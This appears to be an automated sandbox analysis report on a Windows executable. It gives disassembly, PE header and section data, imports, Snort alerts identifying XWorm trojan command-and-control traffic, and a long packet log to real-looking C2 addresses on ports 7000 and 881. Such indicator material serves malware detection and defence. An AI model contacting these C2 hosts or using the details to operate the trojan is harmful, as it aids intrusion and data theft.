mov eax, dword ptr [esi+08h]
test byte ptr [eax+70h], 00000002h
jne 00007F3B50DEC306h
or dword ptr [eax+70h], 02h
mov byte ptr [esi+0Ch], 00000001h
jmp 00007F3B50DEC2FCh
mov ecx, dword ptr [eax]
mov dword ptr [esi], ecx
mov eax, dword ptr [eax+04h]
mov dword ptr [esi+04h], eax
mov eax, esi
pop esi
pop ebp
retn 0004h
mov edi, edi
push ebp
mov ebp, esp
sub esp, 10h
mov eax, dword ptr [0041F920h]
xor eax, ebp
mov dword ptr [ebp-04h], eax
mov edx, dword ptr [ebp+18h]
push ebx

Rich Headers

Programming Language:

[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[IMP] VS2008 SP1 build 30729
[C++] VS2010 build 30319
[RES] VS2010 build 30319
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1d96c	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x23000	0x1c6ec	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x40000	0x138c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x1c378	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x19000	0x150	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x17548	0x17600	4a4de4552a8a05cfea4c4ff1b4e9532e	False	0.5845901570855615	data	6.644459188479388	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x19000	0x50f0	0x5200	a3a672f406e19ad8de1bbcfe8651a57d	False	0.3600895579268293	data	4.931568838551667	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1f000	0x37c4	0x1a00	45f752e15a14fca1b3ff2706b42091af	False	0.3167067307692308	data	3.8749828218454043	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x23000	0x1c6ec	0x1c800	f7f67e74808bd8e37d727b9023fabdcb	False	0.2743540981359649	data	4.804387241910113	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x40000	0x1e2e	0x2000	fdaa21fac2a6fbee01e606c2b1b84ce7	False	0.4864501953125	data	4.81697133250145	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x233a0	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	Chinese	China	0.2554878048780488
RT_ICON	0x23a08	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	Chinese	China	0.3602150537634409
RT_ICON	0x23cf0	0x1e8	Device independent bitmap graphic, 24 x 48 x 4, image size 288	Chinese	China	0.39344262295081966
RT_ICON	0x23ed8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	Chinese	China	0.4358108108108108
RT_ICON	0x24000	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Chinese	China	0.4986673773987207
RT_ICON	0x24ea8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Chinese	China	0.5888989169675091
RT_ICON	0x25750	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Chinese	China	0.548963133640553
RT_ICON	0x25e18	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Chinese	China	0.40534682080924855
RT_ICON	0x26380	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	Chinese	China	0.18236129184904767
RT_ICON	0x36ba8	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	Chinese	China	0.3425838450637695
RT_ICON	0x3add0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Chinese	China	0.3924273858921162
RT_ICON	0x3d378	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Chinese	China	0.49953095684803
RT_ICON	0x3e420	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	Chinese	China	0.580327868852459
RT_ICON	0x3eda8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Chinese	China	0.6906028368794326
RT_GROUP_ICON	0x3f210	0xca	data	Chinese	China	0.6089108910891089
RT_VERSION	0x3f2dc	0x2a8	data	Chinese	China	0.4602941176470588
RT_MANIFEST	0x3f584	0x165	ASCII text, with CRLF line terminators	English	United States	0.5434173669467787

Imports

DLL

Import

KERNEL32.dll

CloseHandle, ReadFile, VirtualAlloc, GetFileSize, CreateFileA, Sleep, GetTickCount64, VirtualFree, SetEndOfFile, CreateFileW, SetStdHandle, WriteConsoleW, LoadLibraryW, IsValidLocale, InterlockedIncrement, InterlockedDecrement, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, EncodePointer, DecodePointer, GetSystemTimeAsFileTime, GetLastError, HeapFree, RaiseException, RtlUnwind, GetCommandLineA, HeapSetInformation, GetStartupInfoW, WideCharToMultiByte, LCMapStringW, MultiByteToWideChar, GetCPInfo, HeapAlloc, IsProcessorFeaturePresent, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetModuleHandleW, SetLastError, GetCurrentThreadId, GetProcAddress, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, GetCurrentProcess, HeapCreate, SetHandleCount, GetStdHandle, InitializeCriticalSectionAndSpinCount, GetFileType, ExitProcess, WriteFile, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, GetModuleFileNameW, GetModuleFileNameA, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetACP, GetOEMCP, IsValidCodePage, GetStringTypeW, GetLocaleInfoW, HeapReAlloc, HeapSize, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, GetProcessHeap

WININET.dll

InternetCloseHandle, InternetReadFile, InternetOpenUrlA, InternetOpenA

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	China
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
07/02/24-19:21:18.807141	TCP	2855924	ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound	49712	7000	192.168.2.6	156.238.235.31
07/02/24-19:25:04.354852	TCP	2852870	ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes	7000	49712	156.238.235.31	192.168.2.6
07/02/24-19:24:55.688649	TCP	2852874	ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2	7000	49712	156.238.235.31	192.168.2.6
07/02/24-19:25:04.355848	TCP	2852923	ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	49712	7000	192.168.2.6	156.238.235.31
07/02/24-19:22:57.227073	TCP	2853193	ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound	49712	7000	192.168.2.6	156.238.235.31

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 2, 2024 19:20:59.793061018 CEST	49710	881	192.168.2.6	91.208.240.157
Jul 2, 2024 19:20:59.797980070 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:20:59.798129082 CEST	49710	881	192.168.2.6	91.208.240.157
Jul 2, 2024 19:20:59.798795938 CEST	49710	881	192.168.2.6	91.208.240.157
Jul 2, 2024 19:20:59.803639889 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:00.729688883 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:00.729723930 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:00.729801893 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:00.729819059 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:00.729837894 CEST	49710	881	192.168.2.6	91.208.240.157
Jul 2, 2024 19:21:00.729842901 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:00.729861975 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:00.729866982 CEST	49710	881	192.168.2.6	91.208.240.157
Jul 2, 2024 19:21:00.729912043 CEST	49710	881	192.168.2.6	91.208.240.157
Jul 2, 2024 19:21:00.729965925 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:00.729984999 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:00.730004072 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:00.730010033 CEST	49710	881	192.168.2.6	91.208.240.157
Jul 2, 2024 19:21:00.730031013 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:00.730053902 CEST	49710	881	192.168.2.6	91.208.240.157
Jul 2, 2024 19:21:00.730087996 CEST	49710	881	192.168.2.6	91.208.240.157
Jul 2, 2024 19:21:00.734653950 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:00.734708071 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:00.734714031 CEST	49710	881	192.168.2.6	91.208.240.157
Jul 2, 2024 19:21:00.734754086 CEST	49710	881	192.168.2.6	91.208.240.157
Jul 2, 2024 19:21:00.734855890 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:00.734899998 CEST	49710	881	192.168.2.6	91.208.240.157
Jul 2, 2024 19:21:00.967556000 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:00.967585087 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:00.967617035 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:00.967633009 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:00.967653036 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:00.967673063 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:00.967725039 CEST	49710	881	192.168.2.6	91.208.240.157
Jul 2, 2024 19:21:00.967787027 CEST	49710	881	192.168.2.6	91.208.240.157
Jul 2, 2024 19:21:00.967966080 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:00.967993975 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:00.968014956 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:00.968015909 CEST	49710	881	192.168.2.6	91.208.240.157
Jul 2, 2024 19:21:00.968033075 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:00.968051910 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:00.968051910 CEST	49710	881	192.168.2.6	91.208.240.157
Jul 2, 2024 19:21:00.968075991 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:00.968087912 CEST	49710	881	192.168.2.6	91.208.240.157
Jul 2, 2024 19:21:00.968130112 CEST	49710	881	192.168.2.6	91.208.240.157
Jul 2, 2024 19:21:00.968914032 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:00.968943119 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:00.968962908 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:00.968965054 CEST	49710	881	192.168.2.6	91.208.240.157
Jul 2, 2024 19:21:00.968981981 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:00.969001055 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:00.969007015 CEST	49710	881	192.168.2.6	91.208.240.157
Jul 2, 2024 19:21:00.969018936 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:00.969038963 CEST	49710	881	192.168.2.6	91.208.240.157
Jul 2, 2024 19:21:00.969068050 CEST	49710	881	192.168.2.6	91.208.240.157
Jul 2, 2024 19:21:00.969857931 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:00.969877958 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:00.969907045 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:00.969911098 CEST	49710	881	192.168.2.6	91.208.240.157
Jul 2, 2024 19:21:00.969924927 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:00.969939947 CEST	49710	881	192.168.2.6	91.208.240.157
Jul 2, 2024 19:21:00.969944954 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:00.969960928 CEST	49710	881	192.168.2.6	91.208.240.157
Jul 2, 2024 19:21:00.969984055 CEST	49710	881	192.168.2.6	91.208.240.157
Jul 2, 2024 19:21:00.972584009 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:00.972652912 CEST	49710	881	192.168.2.6	91.208.240.157
Jul 2, 2024 19:21:00.972652912 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:00.972698927 CEST	49710	881	192.168.2.6	91.208.240.157
Jul 2, 2024 19:21:01.205224037 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:01.205317020 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:01.205384970 CEST	49710	881	192.168.2.6	91.208.240.157
Jul 2, 2024 19:21:01.205401897 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:01.205419064 CEST	49710	881	192.168.2.6	91.208.240.157
Jul 2, 2024 19:21:01.205455065 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:01.205461025 CEST	49710	881	192.168.2.6	91.208.240.157
Jul 2, 2024 19:21:01.205511093 CEST	49710	881	192.168.2.6	91.208.240.157
Jul 2, 2024 19:21:01.205519915 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:01.205560923 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:01.205576897 CEST	49710	881	192.168.2.6	91.208.240.157
Jul 2, 2024 19:21:01.205606937 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:01.205619097 CEST	49710	881	192.168.2.6	91.208.240.157
Jul 2, 2024 19:21:01.205648899 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:01.205657959 CEST	49710	881	192.168.2.6	91.208.240.157
Jul 2, 2024 19:21:01.205687046 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:01.205704927 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:01.205704927 CEST	49710	881	192.168.2.6	91.208.240.157
Jul 2, 2024 19:21:01.205724955 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:01.205725908 CEST	49710	881	192.168.2.6	91.208.240.157
Jul 2, 2024 19:21:01.205749035 CEST	49710	881	192.168.2.6	91.208.240.157
Jul 2, 2024 19:21:01.205775023 CEST	49710	881	192.168.2.6	91.208.240.157
Jul 2, 2024 19:21:01.205816031 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:01.205833912 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:01.205859900 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:01.205866098 CEST	49710	881	192.168.2.6	91.208.240.157
Jul 2, 2024 19:21:01.205887079 CEST	49710	881	192.168.2.6	91.208.240.157
Jul 2, 2024 19:21:01.205914021 CEST	49710	881	192.168.2.6	91.208.240.157
Jul 2, 2024 19:21:01.205945015 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:01.205964088 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:01.205982924 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:01.205998898 CEST	49710	881	192.168.2.6	91.208.240.157
Jul 2, 2024 19:21:01.206001997 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:01.206047058 CEST	49710	881	192.168.2.6	91.208.240.157
Jul 2, 2024 19:21:01.206067085 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:01.206083059 CEST	49710	881	192.168.2.6	91.208.240.157
Jul 2, 2024 19:21:01.206084967 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:01.206118107 CEST	49710	881	192.168.2.6	91.208.240.157
Jul 2, 2024 19:21:01.206136942 CEST	49710	881	192.168.2.6	91.208.240.157
Jul 2, 2024 19:21:01.206600904 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:01.206631899 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:01.206650019 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:01.206653118 CEST	49710	881	192.168.2.6	91.208.240.157
Jul 2, 2024 19:21:01.206674099 CEST	49710	881	192.168.2.6	91.208.240.157
Jul 2, 2024 19:21:01.206700087 CEST	49710	881	192.168.2.6	91.208.240.157
Jul 2, 2024 19:21:01.206814051 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:01.206866026 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:01.206866026 CEST	49710	881	192.168.2.6	91.208.240.157
Jul 2, 2024 19:21:01.206886053 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:01.206906080 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:21:01.206909895 CEST	49710	881	192.168.2.6	91.208.240.157
Jul 2, 2024 19:21:01.206929922 CEST	49710	881	192.168.2.6	91.208.240.157
Jul 2, 2024 19:21:01.206954956 CEST	49710	881	192.168.2.6	91.208.240.157
Jul 2, 2024 19:21:08.593209982 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:21:08.599009037 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:21:08.599119902 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:21:08.717434883 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:21:08.722500086 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:21:18.807141066 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:21:18.812153101 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:21:19.125055075 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:21:19.179717064 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:21:19.431471109 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:21:19.436207056 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:21:25.684818983 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:21:25.726649046 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:21:28.899960041 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:21:28.904870987 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:21:29.215818882 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:21:29.222966909 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:21:29.227804899 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:21:38.992804050 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:21:38.999598980 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:21:39.455928087 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:21:39.459136963 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:21:39.463927031 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:21:49.086750031 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:21:49.091617107 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:21:49.402178049 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:21:49.412224054 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:21:49.417469025 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:21:55.684200048 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:21:55.726634979 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:21:59.179985046 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:21:59.184711933 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:21:59.514632940 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:21:59.517605066 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:21:59.522593975 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:22:06.208916903 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:22:06.209029913 CEST	49710	881	192.168.2.6	91.208.240.157
Jul 2, 2024 19:22:09.281100988 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:22:09.286555052 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:22:09.596302986 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:22:09.598550081 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:22:09.603451014 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:22:19.367544889 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:22:19.372447968 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:22:19.687508106 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:22:19.702212095 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:22:19.707083941 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:22:25.692378998 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:22:25.745198965 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:22:29.461374044 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:22:29.466212988 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:22:29.777153969 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:22:29.779062986 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:22:29.785511971 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:22:39.555286884 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:22:39.560198069 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:22:39.896349907 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:22:39.902084112 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:22:39.906950951 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:22:41.539473057 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:22:41.545684099 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:22:41.922030926 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:22:41.930083990 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:22:41.936285973 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:22:46.727310896 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:22:46.732182980 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:22:46.836477041 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:22:46.841376066 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:22:46.852045059 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:22:46.857091904 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:22:46.914798975 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:22:46.919634104 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:22:46.930160999 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:22:46.935436010 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:22:46.992749929 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:22:46.998213053 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:22:47.051199913 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:22:47.053266048 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:22:47.058137894 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:22:47.271914959 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:22:47.274363995 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:22:47.279108047 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:22:47.495666027 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:22:47.497394085 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:22:47.502252102 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:22:47.502311945 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:22:47.507010937 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:22:47.706434011 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:22:47.710346937 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:22:47.715691090 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:22:49.336594105 CEST	49710	881	192.168.2.6	91.208.240.157
Jul 2, 2024 19:22:49.341425896 CEST	881	49710	91.208.240.157	192.168.2.6
Jul 2, 2024 19:22:51.023863077 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:22:51.029045105 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:22:51.340300083 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:22:51.342724085 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:22:51.347724915 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:22:55.672386885 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:22:55.726739883 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:22:57.164684057 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:22:57.169503927 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:22:57.227072954 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:22:57.231888056 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:22:57.496575117 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:22:57.498212099 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:22:57.503401995 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:22:57.700462103 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:22:57.702790976 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:22:57.707792997 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:23:07.321041107 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:23:07.326109886 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:23:07.644391060 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:23:07.665540934 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:23:07.670366049 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:23:17.414582014 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:23:17.868839979 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:23:18.085601091 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:23:18.085621119 CEST	7000	49712	156.238.235.31	192.168.2.6
